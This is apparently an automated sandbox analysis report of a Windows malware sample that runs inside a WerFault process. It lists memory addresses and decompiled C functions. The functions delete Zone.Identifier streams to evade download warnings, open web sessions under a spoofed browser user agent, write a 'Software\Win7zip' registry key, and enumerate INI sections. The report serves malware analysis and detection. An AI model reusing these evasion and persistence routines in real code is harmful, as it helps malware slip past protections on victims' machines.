                        0x02884f54
                        0x02884f54
                        0x00000000
                        0x02884f85
                        0x02884f88
                        0x02884f8c
                        0x02884f94
                        0x02884f97
                        0x02884f9c
                        0x02884faf
                        0x02884fb1
                        0x02884fb4
                        0x02884fb7
                        0x02884fc4
                        0x02884fca
                        0x02884fcc
                        0x02884fce
                        0x02884fd3
                        0x00000000
                        0x00000000
                        0x02884fdf
                        0x02884fe3
                        0x02884ffb
                        0x02885013
                        0x02885014
                        0x0288501a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02885021
                        0x02885024
                        0x0288502a
                        0x00000000
                        0x02885039
                        0x02885048
                        0x02885051
                        0x02885057
                        0x0288505f
                        0x028850ba
                        0x028850bc
                        0x028850c1
                        0x028850c4
                        0x028850c4
                        0x00000000
                        0x028850bc
                        0x02885061
                        0x02885066
                        0x00000000
                        0x00000000
                        0x0288506a
                        0x00000000
                        0x00000000
                        0x0288506f
                        0x02885073
                        0x0288507e
                        0x02885086
                        0x028850b8
                        0x028850b8
                        0x00000000
                        0x028850b8
                        0x02885088
                        0x0288508e
                        0x02885096
                        0x0288509e
                        0x028850ad
                        0x028850b1
                        0x00000000
                        0x00000000
                        0x028850b3
                        0x028850b3
                        0x00000000
                        0x02885073
                        0x0288502a
                        0x02884ffb
                        0x028850c6
                        0x028850c6
                        0x028850cc
                        0x028850d0
                        0x028850d7
                        0x02884fa6
                        0x02884fa9
                        0x02884fac
                        0x00000000
                        0x02884fac
                        0x00000000
                        0x028850dd
                        0x02884faf
                        0x02884f9e
                        0x00000000
                        0x02884f9e
                        0x02884f75
                        0x02884f67
                        0x00000000
                        0x02884f67
                        0x02884f52
                        0x00000000
                        0x02884f52

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: kernel32.dll
                        • API String ID: 0-1793498882
                        • Opcode ID: 830b02f189fe987976ec32ff5b7dcc39e41fb09a6685f8571898ddfb110a50ba
                        • Instruction ID: 3ad1f59601396b9d2c0899e24ae6ea1f25b52a5d481636f7b9d443aa78e93927
                        • Opcode Fuzzy Hash: 830b02f189fe987976ec32ff5b7dcc39e41fb09a6685f8571898ddfb110a50ba
                        • Instruction Fuzzy Hash: 93618B7DE0021A9BCB10DF58C980AAEB7B5FF48318B66865AD819E7241D734E941CFD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02879787 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E02879787(short* _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				long _v20;
				char _v540;
				void* __ebx;
				void* __edi;
				WCHAR* _t33;
				long _t34;
				void* _t44;
				signed int _t45;
				signed int _t48;
				short* _t54;

				_t48 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
					L14:
					return 0;
				} else {
					_t50 = _a12;
					if(E028619E8(_a12) < 6) {
						goto L14;
					}
					_v8 = 0;
					_v12 = 0;
					_t33 = E0286161B(0x8000);
					_v16 = _t33;
					if(_t33 == 0) {
						goto L14;
					}
					_t34 = GetPrivateProfileSectionNamesW(_t33, 0x8000, _a12); // executed
					_v20 = _t34;
					if(_t34 == 0) {
						L13:
						E028617E4(_v16);
						return _v8;
					}
					_t54 = _a4;
					while(1) {
						E028614DB(_t50,  &_v540, _t48, 0x208);
						if(_v8 > _a8) {
							goto L13;
						}
						_push( &(_v16[_v12]));
						_push( &_v540);
						if( *0x289f6ac() != 0) {
							 *_t54 = 0x210;
							if(E028795C9( &_v540, _t54, _a12) != 0) {
								_v8 = _v8 + 1;
								_t54 = _t54 + 0x210;
							}
						}
						_t44 = E028619E8( &_v540);
						_t50 = _v12;
						_t26 = _t44 + 1; // 0x21
						_t45 = _v12 + _t26;
						_v12 = _t45;
						if(_t45 < _v20) {
							_t48 = 0;
							continue;
						} else {
							goto L13;
						}
					}
					goto L13;
				}
			}
















                        0x02879791
                        0x02879797
                        0x02879874
                        0x00000000
                        0x028797af
                        0x028797af
                        0x028797ba
                        0x00000000
                        0x00000000
                        0x028797c6
                        0x028797c9
                        0x028797cc
                        0x028797d1
                        0x028797d6
                        0x00000000
                        0x00000000
                        0x028797e1
                        0x028797e7
                        0x028797ec
                        0x02879867
                        0x0287986a
                        0x00000000
                        0x0287986f
                        0x028797ee
                        0x028797f5
                        0x02879802
                        0x0287980d
                        0x00000000
                        0x00000000
                        0x02879818
                        0x0287981f
                        0x02879828
                        0x02879838
                        0x02879842
                        0x02879844
                        0x02879847
                        0x02879847
                        0x02879842
                        0x02879853
                        0x02879858
                        0x0287985b
                        0x0287985b
                        0x0287985f
                        0x02879865
                        0x028797f3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02879865
                        0x00000000
                        0x028797f5

                        APIs
                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,00008000,02879A4C,00008000,%s\3\%s,00000000), ref: 028797E1
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: NamesPrivateProfileSection
                        • String ID: %s\3\%s
                        • API String ID: 709140578-3598443546
                        • Opcode ID: 0bb51704cd84aa5319029d2bd194631b100c7a2985f7327c0e105a69f1f29815
                        • Instruction ID: 24c0350120b4418da4e8087bc118fe94c43ee63ec83b5b20dfb73d1e570cb0e3
                        • Opcode Fuzzy Hash: 0bb51704cd84aa5319029d2bd194631b100c7a2985f7327c0e105a69f1f29815
                        • Instruction Fuzzy Hash: E7212B7D90024DEBCF10DFE4C8C89AEB77ABF00348F18496AE41AE6251DB30DA55CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0287A8E1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60networkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 43%
                        			E0287A8E1(void* __ecx, void* __esi) {
				char _v264;
				void* _t19;
				long _t20;
				void* _t22;
				signed int _t23;
				void* _t36;

				_t36 = __esi;
				if( *((intOrPtr*)(__esi + 0x64)) == 0xc0) {
					E028614DB(__ecx,  &_v264, 0, 0x104);
					_t19 = E02864199(0x103, __ecx,  &_v264); // executed
					if(_t19 == 0) {
						 *0x289f6a0( &_v264, "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)", 0x103);
					}
					_t20 =  *0x28a0618;
					if(_t20 != 1 && _t20 != 0) {
						_t20 = 0;
					}
					_t22 = InternetOpenA( &_v264, _t20, 0, 0, 0); // executed
					if(_t22 != 0) {
						 *(_t36 + 0x124) = _t22;
						if( *((intOrPtr*)(_t36 + 0xc)) == 0) {
							_push(_t36 + 0x8a);
							if(( *0x289f6b8() ^  *((intOrPtr*)(_t36 + 0x10)) + 0x0000a5f0) !=  *((intOrPtr*)(_t36 + 0x7a))) {
								 *(_t36 + 0x124) =  *(_t36 + 0x124) ^ 0x0000e0a6;
							}
						}
						_t23 =  *(_t36 + 0x124);
					} else {
						_t23 = 0;
					}
					return _t23;
				} else {
					return 0;
				}
			}









                        0x0287a8e1
                        0x0287a8f3
                        0x0287a909
                        0x0287a91a
                        0x0287a921
                        0x0287a934
                        0x0287a934
                        0x0287a93a
                        0x0287a942
                        0x0287a948
                        0x0287a948
                        0x0287a955
                        0x0287a95d
                        0x0287a963
                        0x0287a96c
                        0x0287a974
                        0x0287a989
                        0x0287a98b
                        0x0287a98b
                        0x0287a989
                        0x0287a995
                        0x0287a95f
                        0x0287a95f
                        0x0287a95f
                        0x0287a99d
                        0x0287a8f5
                        0x0287a8f8
                        0x0287a8f8

                        APIs
                        • InternetOpenA.WININET(?,?,00000000,00000000,00000000,?,?,00000000,00000104,000000C0), ref: 0287A955
                        Strings
                        • Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726), xrefs: 0287A928
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InternetOpen
                        • String ID: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
                        • API String ID: 2038078732-1656825793
                        • Opcode ID: 080ce42c03be07a491709a71cdbc2d79dc660f80f393c96d172c6f32a6bb3921
                        • Instruction ID: a8d06d1c530120a24acba0c011b16f818ade8138bd43e9dad83d77f5385b2e9b
                        • Opcode Fuzzy Hash: 080ce42c03be07a491709a71cdbc2d79dc660f80f393c96d172c6f32a6bb3921
                        • Instruction Fuzzy Hash: 1611CEBD600704ABDB35CA38C988FDB73FCAB94705F040829E29AD3580E774E590CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288E7D9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExA.USER32(00000000,tooltips_class32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0288E942,?,?), ref: 0288E827
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateWindow
                        • String ID: tooltips_class32
                        • API String ID: 716092398-1918224756
                        • Opcode ID: f1b215ef09dd678268638e5b3ade3550bf4c894b5f2f53d0ce924dbeb9979a74
                        • Instruction ID: 7a63f63f99d1e6e9f30a3b25449cb586a0487cd8b6e1fadbf1c98711e8f7e98b
                        • Opcode Fuzzy Hash: f1b215ef09dd678268638e5b3ade3550bf4c894b5f2f53d0ce924dbeb9979a74
                        • Instruction Fuzzy Hash: 880186BFB5512037E2243626AC0EEAF1E6FDFD2B7171CC918F219E16D1CE58402285B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288449D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0288449D(void* __ecx, signed int __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, signed int _a16) {
				signed int _v20;
				int _v24;
				int _v28;
				char _v32;
				signed int _t17;
				signed int _t21;
				int _t22;
				int _t26;
				int _t29;

				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
					return _t17 | 0xffffffff;
				} else {
					E028614DB(__ecx,  &_v32, 0, 0x1c);
					_t21 =  *0x28a4100;
					_t26 = _a12;
					_t29 = _a16;
					_v28 = _t26;
					_v24 = _t29;
					_v20 = __edi;
					if(_t21 != 0) {
						_t26 = (_t21 & 0x0000001f) + _a12;
						_t29 = _t21 ^ _a16 ^ 0x002a73e4;
						_v28 = _t26;
						_v24 = _t29;
						_v20 = _t21 ^ __edi ^ 0x002a73e4;
					}
					_t22 = PostMessageA(_a4, _t26, _t29, _v20); // executed
					return _t22;
				}
			}












                        0x028844a9
                        0x00000000
                        0x028844b5
                        0x028844bc
                        0x028844c1
                        0x028844c6
                        0x028844c9
                        0x028844cc
                        0x028844cf
                        0x028844d2
                        0x028844d7
                        0x028844e3
                        0x028844eb
                        0x028844f1
                        0x028844f4
                        0x028844f7
                        0x028844f7
                        0x02884502
                        0x00000000
                        0x02884502

                        APIs
                        • PostMessageA.USER32(?,00000000,028845A8,00000000,?,00000000,0000001C,00000000,?,?,028845A8,00000000,0286E0E2,?,CCCCCCB2), ref: 02884502
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePost
                        • String ID: s*
                        • API String ID: 410705778-999847807
                        • Opcode ID: aad07a58703a43fb90c985610c2764ff9789c47886d556ed94869be6d1cf1a7a
                        • Instruction ID: 100c79e622756a0f636f7729595e9825054aba001ea355c16a6c2431ce8745cf
                        • Opcode Fuzzy Hash: aad07a58703a43fb90c985610c2764ff9789c47886d556ed94869be6d1cf1a7a
                        • Instruction Fuzzy Hash: 01014CBAD0122EDBCF04DF54DC408AFBBB5BB94700B04852AF816E2245D7708A51CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286295B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E0286295B(void* __ecx, void* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v8;
				void* _t12;
				long _t15;

				_push(__ecx);
				_v8 = 0;
				if(_a8 == 0 || E028619D6(_a8) == 0) {
					L4:
					_t12 = 0;
				} else {
					_t15 = RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x102, 0,  &_v8, 0); // executed
					if(_t15 != 0) {
						goto L4;
					} else {
						L0288776E(_v8, _a12, 0, 3, _a16, _a20); // executed
						 *0x289fb1c(_v8);
						_t12 = 1;
					}
				}
				return _t12;
			}






                        0x0286295e
                        0x02862962
                        0x02862968
                        0x028629b5
                        0x028629b5
                        0x02862976
                        0x0286298a
                        0x02862992
                        0x00000000
                        0x02862994
                        0x028629a3
                        0x028629ab
                        0x028629b1
                        0x028629b1
                        0x02862992
                        0x028629b9

                        APIs
                        • RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,00000102,00000000,00000010,00000000,Software\Win7zip,?,?,028707CC,80000002,Software\Win7zip,Uuid), ref: 0286298A
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create
                        • String ID: Software\Win7zip
                        • API String ID: 2289755597-229439935
                        • Opcode ID: 48d9bf02f3f4b394c42542b919c04bd528392af6a66a99458f68e0a3b0d3d78c
                        • Instruction ID: 079c1d634292f44d45bdf1c52162af706c9d024cc33ff497cde3363768e9a658
                        • Opcode Fuzzy Hash: 48d9bf02f3f4b394c42542b919c04bd528392af6a66a99458f68e0a3b0d3d78c
                        • Instruction Fuzzy Hash: 96F0493A501128BBCF11AF92DD09EEF7F6EEF46756B108051FD09E5164D7718A20EBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028855FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 33%
                        			E028855FF(void* __ecx) {
				char _v8;
				void* _t3;
				void* _t9;
				intOrPtr _t12;

				_t12 = 0;
				_t3 = E02865E00(E028855D5, 0, 0, 0xc, 0,  &_v8, 0x18); // executed
				_t9 = _t3;
				if(_t9 != 0) {
					_push(0xbb8);
					_push(_t9);
					if( *0x289f8a4() == 0) {
						_t12 = 1;
					}
					FindCloseChangeNotification(_t9); // executed
				}
				return _t12;
			}







                        0x0288560b
                        0x02885617
                        0x0288561c
                        0x02885620
                        0x02885622
                        0x02885627
                        0x02885630
                        0x02885632
                        0x02885632
                        0x02885634
                        0x02885634
                        0x0288563f

                        APIs
                        • FindCloseChangeNotification.KERNEL32(00000000,?,?,02870858,LCT), ref: 02885634
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID: LCT
                        • API String ID: 2591292051-831726749
                        • Opcode ID: 45ecbd5f888eb54a383d099c2f299d6aec004b531e456bf39eaa2686093eb01b
                        • Instruction ID: fd8650e2717d6ddcd5201835ce64ba3adb9c03856a6563feb7202503cdd5b446
                        • Opcode Fuzzy Hash: 45ecbd5f888eb54a383d099c2f299d6aec004b531e456bf39eaa2686093eb01b
                        • Instruction Fuzzy Hash: E8E0DF3A34122077E530A65A8C0DEEB7F9DCB92EE5FA50018F60AE2081DB949401C1F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288DE6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E0288DE6C(intOrPtr _a4) {
				short _v524;
				signed int _t16;

				if(_a4 == 0) {
					L3:
					return 0;
				}
				_t18 = _a4;
				if(E028619E8(_a4) == 0) {
					goto L3;
				}
				E028614DB(_t18,  &_v524, 0, 0x208);
				 *0x289fa88( &_v524, L"%s:Zone.Identifier", _a4);
				_t16 = DeleteFileW( &_v524); // executed
				return _t16 & 0xffffff00 | _t16 != 0x00000000;
			}





                        0x0288de79
                        0x0288dec6
                        0x00000000
                        0x0288dec6
                        0x0288de7b
                        0x0288de85
                        0x00000000
                        0x00000000
                        0x0288de95
                        0x0288dea9
                        0x0288deb9
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteFile
                        • String ID: %s:Zone.Identifier
                        • API String ID: 4033686569-2483707826
                        • Opcode ID: 81ba72726a1571abf114b51b35261a14a2ce4d170e66fb9ce3c0fa5628d3ad1f
                        • Instruction ID: 7d042619b1bb490e58c8e870b63259b9775098afe1f948a9e3f451ca43fb78d4
                        • Opcode Fuzzy Hash: 81ba72726a1571abf114b51b35261a14a2ce4d170e66fb9ce3c0fa5628d3ad1f
                        • Instruction Fuzzy Hash: 06F08C3D940308A7DF50AE74DC4EFDB37AC5F20349F0445A0AA59D60E2EF78D6A5CA91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028800ED Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 157COMMON
                        Download Yara Rule
                        C-Code - Quality: 64%
                        			E028800ED(void* __ecx, signed int _a4) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v548;
				void* __ebx;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				void* _t54;
				void* _t58;
				signed int _t61;
				signed int _t63;
				signed int _t66;
				signed int _t70;
				void* _t72;
				signed int _t73;
				signed int _t81;
				signed int _t84;
				void* _t85;
				intOrPtr _t86;
				signed int _t88;
				signed int _t93;

				_t84 = 0;
				if(_a4 == 0) {
					return 0;
				}
				_v16 = 0;
				_a4 = 0;
				_v12 = 0;
				_t73 = 0;
				_v20 = 0;
				_v24 = 0;
				E028614DB(__ecx,  &_v548, 0, 0x208);
				 *0x289f730( &_v548, 0x103, _t85, _t72);
				_t48 = E028619E8( &_v548);
				_t86 =  *0x289f2e8;
				__eflags = _t48;
				if(_t48 == 0) {
					L5:
					_t81 = 1;
					__eflags = 1;
					goto L6;
				} else {
					_t83 = _t86 + 0x13be;
					_t70 = E02861E0B(_t86 + 0x13be,  &_v548);
					__eflags = _t70;
					if(_t70 < 0) {
						goto L5;
					} else {
						_t81 = 1;
						_t73 = 1;
						L6:
						_t50 = E0286D774( *(_t86 + 4) & 0x0000ffff);
						__eflags = _t50 - 1;
						if(_t50 == 1) {
							_v24 = _t81;
							_v20 = _t81;
						}
						__eflags = _t50;
						if(_t50 == 0) {
							__eflags = _t73;
							if(_t73 == 0) {
								_v28 = 0;
								_v8 = 0;
								_t66 =  *0x289f618(0xffffffff, 0x1d,  &_v8, 4,  &_v28);
								__eflags = _t66;
								if(_t66 >= 0) {
									__eflags = _v28;
									if(_v28 != 0) {
										__eflags = _v8;
										if(_v8 != 0) {
											_v8 = 0;
											 *0x289f614(0xffffffff, 0x1d,  &_v8, 4);
										}
									}
								}
							}
						}
						__eflags =  *0x289f2f4 & 0x00000020;
						if(( *0x289f2f4 & 0x00000020) != 0) {
							_a4 = 2;
						}
						while(1) {
							_t51 =  *0x289f8a4( *0x289fdb0, 0x12c);
							__eflags = _t51;
							if(_t51 == 0) {
								break;
							}
							__eflags = _v20 - 1;
							if(_v20 != 1) {
								_a4 = 1;
							} else {
								__eflags = _a4;
								if(_a4 == 0) {
									_t61 =  *0x289fdc8;
									asm("sbb esi, esi");
									_t93 = ( ~(_t61 & 0x00000200) & 0xfffffffe) + 5;
									__eflags = _t61;
									if(_t61 < 0) {
										_t93 = 0xc; // executed
									}
									E028802BF(_t81, _t83); // executed
									_a4 = _t93;
								}
							}
							__eflags =  *0x28a071c & 0x00000001;
							if(( *0x28a071c & 0x00000001) == 0) {
								L37:
								Sleep(0x7d0); // executed
								_t84 = _t84 - 1;
								_v16 = _v16 - 1;
								_t42 =  &_a4;
								 *_t42 = _a4 - 1;
								__eflags =  *_t42;
								continue;
							} else {
								__eflags = _v24 - 1;
								if(_v24 != 1) {
									L32:
									__eflags = _v16;
									if(_v16 == 0) {
										E02888DDE(_t81);
										_v16 = 2;
									}
									_t54 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
									__eflags = _t54 - 1;
									if(_t54 == 1) {
										__eflags = E02878E4C();
										if(__eflags >= 0) {
											E02878E8F(_t81, __eflags);
										}
									}
									goto L37;
								}
								__eflags = _t84;
								if(_t84 != 0) {
									goto L32;
								}
								__eflags = _v12 - 0x40;
								if(_v12 < 0x40) {
									_t88 = 0;
									__eflags = 0;
									do {
										__eflags = _t88;
										if(_t88 != 0) {
											_t58 = E0288956C(_t88, _t81);
											__eflags = _t58 - 1;
											if(_t58 == 1) {
												_t34 =  &_v12;
												 *_t34 = _v12 + 1;
												__eflags =  *_t34;
											}
										}
										_t88 = _t88 + 1;
										__eflags = _t88 - 0x50;
									} while (_t88 < 0x50);
									__eflags = 1 - _v12;
									asm("sbb edi, edi");
									_t84 = _t84 + 5;
									__eflags = _t84;
								}
								goto L32;
							}
						}
						_t63 = _t51 + 1;
						__eflags = _t63;
						return _t63;
					}
				}
			}




























                        0x028800f7
                        0x028800fc
                        0x00000000
                        0x028800fe
                        0x02880114
                        0x02880117
                        0x0288011a
                        0x0288011d
                        0x0288011f
                        0x02880122
                        0x02880125
                        0x02880136
                        0x02880142
                        0x02880147
                        0x0288014d
                        0x0288014f
                        0x0288016e
                        0x02880170
                        0x02880170
                        0x00000000
                        0x02880151
                        0x02880158
                        0x0288015e
                        0x02880163
                        0x02880165
                        0x00000000
                        0x02880167
                        0x02880169
                        0x0288016a
                        0x02880171
                        0x02880176
                        0x0288017b
                        0x0288017d
                        0x0288017f
                        0x02880182
                        0x02880182
                        0x02880185
                        0x02880187
                        0x0288018b
                        0x0288018d
                        0x0288019d
                        0x028801a0
                        0x028801a3
                        0x028801a9
                        0x028801ab
                        0x028801ad
                        0x028801b0
                        0x028801b2
                        0x028801b5
                        0x028801c1
                        0x028801c4
                        0x028801c4
                        0x028801b5
                        0x028801b0
                        0x028801ab
                        0x0288018d
                        0x028801ca
                        0x028801d1
                        0x028801d7
                        0x028801d7
                        0x0288029e
                        0x028802a9
                        0x028802af
                        0x028802b1
                        0x00000000
                        0x00000000
                        0x028801e6
                        0x028801e9
                        0x02880219
                        0x028801eb
                        0x028801eb
                        0x028801ef
                        0x028801f1
                        0x02880200
                        0x02880205
                        0x02880208
                        0x0288020a
                        0x0288020e
                        0x0288020e
                        0x0288020f
                        0x02880214
                        0x02880214
                        0x028801ef
                        0x0288021c
                        0x02880223
                        0x0288028c
                        0x02880291
                        0x02880297
                        0x02880298
                        0x0288029b
                        0x0288029b
                        0x0288029b
                        0x00000000
                        0x02880225
                        0x02880225
                        0x02880228
                        0x02880259
                        0x02880259
                        0x0288025d
                        0x0288025f
                        0x02880264
                        0x02880264
                        0x02880275
                        0x0288027a
                        0x0288027c
                        0x02880283
                        0x02880285
                        0x02880287
                        0x02880287
                        0x02880285
                        0x00000000
                        0x0288027c
                        0x0288022a
                        0x0288022c
                        0x00000000
                        0x00000000
                        0x0288022e
                        0x02880232
                        0x02880234
                        0x02880234
                        0x02880236
                        0x02880236
                        0x02880238
                        0x0288023c
                        0x02880241
                        0x02880243
                        0x02880245
                        0x02880245
                        0x02880245
                        0x02880245
                        0x02880243
                        0x02880248
                        0x02880249
                        0x02880249
                        0x02880251
                        0x02880254
                        0x02880256
                        0x02880256
                        0x02880256
                        0x00000000
                        0x02880232
                        0x02880223
                        0x028802b8
                        0x028802b8
                        0x00000000
                        0x028802b9
                        0x02880165

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 16941b7196ad20ddcd247e101584d4ce0da89f4e9a38de986f6427a40050f2ca
                        • Instruction ID: 0fbc313512fa00b4feb0604727c7f90ecbf4eef934d70e6b7a833b013733afc1
                        • Opcode Fuzzy Hash: 16941b7196ad20ddcd247e101584d4ce0da89f4e9a38de986f6427a40050f2ca
                        • Instruction Fuzzy Hash: D651F77DD40218AADF22BFD8D844BFE77B4AF05714F14412AEA59E7181C7B09688CF86
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286D39F Relevance: 3.1, APIs: 2, Instructions: 79COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E0286D39F() {
				signed int _v8;
				signed int _v12;
				short* _v16;
				signed int _v20;
				void* __ebx;
				short _t50;
				signed int _t65;

				_v16 = E0286161B(0x38);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				if(_v16 != 0) {
					_v20 = E028610C7;
					_t50 = 0x38;
					 *_v16 = _t50;
					 *((intOrPtr*)(_v16 + 0xc)) =  *0x289f2e8;
					 *((intOrPtr*)(_v16 + 8)) =  *((intOrPtr*)( *0x289f2e8 + 0x156));
					 *((intOrPtr*)(_v16 + 4)) = 0x289098c;
					 *((intOrPtr*)(_v16 + 0x10)) =  *0x289f908();
					 *((intOrPtr*)(_v16 + 0x14)) =  *((intOrPtr*)( *0x289f2e8 + 0x1e));
					 *((intOrPtr*)(_v16 + 0x18)) = E02874941;
					 *((intOrPtr*)(_v16 + 0x20)) = E0286161B;
					 *((intOrPtr*)(_v16 + 0x24)) = E028617E4;
					 *((intOrPtr*)(_v16 + 0x28)) = E028624EB;
					 *((intOrPtr*)(_v16 + 0x1c)) = E02874B7A;
					 *((intOrPtr*)(_v16 + 0x2c)) = E02874997;
					 *((intOrPtr*)(_v16 + 0x30)) = 0x289f530;
					_t82 = _v20;
					 *(_v16 + 0x34) = _v20;
					_v8 = E02874831();
					if(_v8 != 0) {
						_t65 = E02865D65(_v8, _t82, _v16); // executed
						_v12 = _t65;
						if(_v12 == 0) {
							E028617E4(_v16);
							return 0;
						}
						SleepEx(0x3c, 0); // executed
						FindCloseChangeNotification(_v12); // executed
						return 1;
					}
					return 0;
				}
				return 0;
			}










                        0x0286d3ad
                        0x0286d3b0
                        0x0286d3b4
